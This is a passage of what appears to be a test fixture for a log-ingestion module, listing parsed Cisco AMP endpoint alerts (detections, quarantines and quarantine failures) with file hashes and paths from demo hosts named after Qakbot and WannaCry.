"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 25793, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:09:00.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1493058569636000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T14:09:00.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 30752, + "process.hash.sha256": "b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:46:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + 
"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6264772016730013699", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 611000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772016730014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 32509, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:45:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.D5221F6847-100.SBX.TG", + "cisco.amp.detection_id": "6264772012435046402", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 940000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264772012435046000, + "event.kind": "alert", + "event.module": 
"cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "Unconfirmed 762952.crdownload", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34974, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214500913741862", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 724000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36260, + "related.hash": [ + 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741859", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38805, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 5580, + "related.hash": [ + 
"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741858", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 210000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40328, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + 
"10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741855", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 194000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41673, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741857", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 178000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43279, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + 
"db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:32.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.24D004A104-100.SBX.TG", + "cisco.amp.detection_id": "6419214500913741856", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 163000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214500913742000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44631, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + 
"8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:43:30.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419214488028839966", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 447000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419214492323807000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47096, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:29:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.event_type_id": 
1107296257, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 535214029, + "event.action": "Potential Dropper Infection", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945890085425, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T13:29:36.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 49823, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:28:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "02:2f:e0:10:03:5d" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "02:2f:e0:10:03:5d" + ], + "cisco.amp.timestamp_nanoseconds": 341000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6412574627503014000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_3", + "host.name": "Demo_Qakbot_3", + "input.type": "log", + "log.offset": 51019, + "related.hosts": [ + "Demo_Qakbot_3" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": 
"cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 50000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": 
"6419204910251769885", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53134, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802584", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + 
"cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 55679, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802583", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + 
"log.offset": 56872, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802582", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 58065, + "related.hash": [ + 